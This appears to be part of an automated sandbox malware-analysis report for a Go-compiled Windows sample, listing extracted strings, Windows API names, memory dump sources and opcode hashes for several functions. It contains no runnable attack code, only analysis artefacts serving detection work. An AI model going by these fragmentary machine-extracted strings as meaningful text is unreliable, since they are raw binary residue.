                                                                                • gcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encodinginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1, xrefs: 00AC79CB
                                                                                • &, xrefs: 00AC7A2E
                                                                                • work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsEx, xrefs: 00AC78D6
                                                                                • work.nwait was > work.nprocx509: malformed certificate args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreate, xrefs: 00AC79B5
                                                                                • worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , , xrefs: 00AC79F0
                                                                                • work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW, xrefs: 00AC7934
                                                                                • GC worker initGetConsoleModeGetProcAddressGetShellWindowGetTickCount64GetUserNameExWIsWellKnownSidIsWow64ProcessLoadLibraryExWLoadRegTypeLibMB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCMa, xrefs: 00AC75FE, 00AC760C
                                                                                • runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in syste, xrefs: 00AC78AB
                                                                                • work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses, xrefs: 00AC7900, 00AC7981
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses$ work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsEx$&$GC worker initGetConsoleModeGetProcAddressGetShellWindowGetTickCount64GetUserNameExWIsWellKnownSidIsWow64ProcessLoadLibraryExWLoadRegTypeLibMB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCMa$gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinsufficient data for base length typeinternal error: unknown string type %dm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free po$gcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encodinginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1$runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in syste$runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR$work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW$work.nwait was > work.nprocx509: malformed certificate args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreate$worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= ,
                                                                                • API String ID: 0-4120117168
                                                                                • Opcode ID: 4143d49a9b3732c880c081edf45253dc3ec364f7aeac792e8b809515f35ef199
                                                                                • Instruction ID: 5e3ed01e9137bbd237a743a4c7a5e78f8c0cc31e28102bbad4aefe4423d7ae71
                                                                                • Opcode Fuzzy Hash: 4143d49a9b3732c880c081edf45253dc3ec364f7aeac792e8b809515f35ef199
                                                                                • Instruction Fuzzy Hash: 63C1DDB49097458FC344EF69D294B5EBBE0BF88304F41896DE8898B352DB74D889CF52
                                                                                Function 00ACC230 Relevance: 14.0, Strings: 11, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_Digi, xrefs: 00ACC31A
                                                                                • ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384, xrefs: 00ACC4FD, 00ACC608
                                                                                • s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteService, xrefs: 00ACC344
                                                                                • s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCall, xrefs: 00ACC36E
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACC558
                                                                                • unknown(wsaioctlx509sha1 (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, , xrefs: 00ACC41A
                                                                                • <== as at fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1, xrefs: 00ACC5C2
                                                                                • s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltM, xrefs: 00ACC4A9
                                                                                • s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFile, xrefs: 00ACC2F0
                                                                                • ) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4, xrefs: 00ACC582
                                                                                • =?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-, xrefs: 00ACC293
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384$ <== as at fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1$ s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFile$ s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCall$ s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_Digi$ s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteService$ s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltM$) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-$unknown(wsaioctlx509sha1 (forced) B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=,
                                                                                • API String ID: 0-2301861421
                                                                                • Opcode ID: 30e9ee588f2285adc31f635d8df9ec80d06d9af8257962e3a3198a7adda58654
                                                                                • Instruction ID: cc52de1c844f41fbd55b3811d9a4d6915f8ac6417f2532564dc9bd18d2ff4400
                                                                                • Opcode Fuzzy Hash: 30e9ee588f2285adc31f635d8df9ec80d06d9af8257962e3a3198a7adda58654
                                                                                • Instruction Fuzzy Hash: 31B1E8B4909B818FC304EF75E295B5EBBE0BF89748F81882DF4898B352D774D9448B52
                                                                                Function 00AB9C70 Relevance: 14.0, Strings: 11, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socket : Elem of inv, xrefs: 00ABA07A
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AB9FBD, 00ABA049
                                                                                • system huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAze, xrefs: 00AB9EA3
                                                                                • $, xrefs: 00ABA028
                                                                                • bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: i, xrefs: 00AB9EEA
                                                                                • ) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeEFI Boot Service DriverFreeEnv, xrefs: 00AB9ECF, 00AB9F31
                                                                                • system page size (tracebackancestorstruncated sequenceuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard Tim, xrefs: 00AB9F05, 00AB9F67, 00AB9FF3
                                                                                • bad TinySizeClassdatadir_certtabledebugPtrmask.lockentersyscallblockexec format errorexec: not startedfractional secondg already scannedglobalAlloc.mutexgp.waiting != nilinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size locked m0 woke upmark , xrefs: 00ABA09A
                                                                                • ) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Ad, xrefs: 00ABA01F
                                                                                • bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pflag: help requestedfloating point errorforcegc: phase errorgetCert can't be nilgo of nil func valuegopark: bad g status, xrefs: 00AB9F4C, 00AB9FD8, 00ABA064
                                                                                • ) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missing` VirtualAddress is beyond 0x10000000all goroutines are asleep - deadlock!cannot exec a shared library directlyc, xrefs: 00AB9F93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Ad$) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missing` VirtualAddress is beyond 0x10000000all goroutines are asleep - deadlock!cannot exec a shared library directlyc$) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeEFI Boot Service DriverFreeEnv$bad TinySizeClassdatadir_certtabledebugPtrmask.lockentersyscallblockexec format errorexec: not startedfractional secondg already scannedglobalAlloc.mutexgp.waiting != nilinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size locked m0 woke upmark $bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: i$bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pflag: help requestedfloating point errorforcegc: phase errorgetCert can't be nilgo of nil func valuegopark: bad g status$failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socket : Elem of inv$system huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAze$system page size (tracebackancestorstruncated sequenceuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard Tim
                                                                                • API String ID: 0-1086660936
                                                                                • Opcode ID: f2dbffbc6dcfccd356793f63a64cf65692156b59321d27dd5c0ae58cef411710
                                                                                • Instruction ID: b6477aed7aea703cfc70b7816fca39b3fb36e82183a41704435f4a4984bde7bb
                                                                                • Opcode Fuzzy Hash: f2dbffbc6dcfccd356793f63a64cf65692156b59321d27dd5c0ae58cef411710
                                                                                • Instruction Fuzzy Hash: 72B17AB4508745CFC300EF66E69479EBBE5FB8A308F41882DE48987392E7749849CF12
                                                                                Function 00AD1D16 Relevance: 13.0, Strings: 10, Instructions: 459COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AD21AE
                                                                                • sweep increased allocation counttransform: short internal bufferuse of closed network connectionx509: ECDSA verification failurex509: cannot parse rfc822Name %qx509: invalid constraint value: x509: malformed subjectPublicKeyx509: unsupported elliptic curve of , xrefs: 00AD22CF
                                                                                • swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AD2134
                                                                                • runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AD2212
                                                                                • mspan.sweep: bad span state after sweepout of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+, xrefs: 00AD21E2
                                                                                • sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari, xrefs: 00AD2184
                                                                                • previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregist, xrefs: 00AD2269
                                                                                • mspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in , xrefs: 00AD2156
                                                                                • nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebr, xrefs: 00AD223C
                                                                                • , xrefs: 00AD22D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
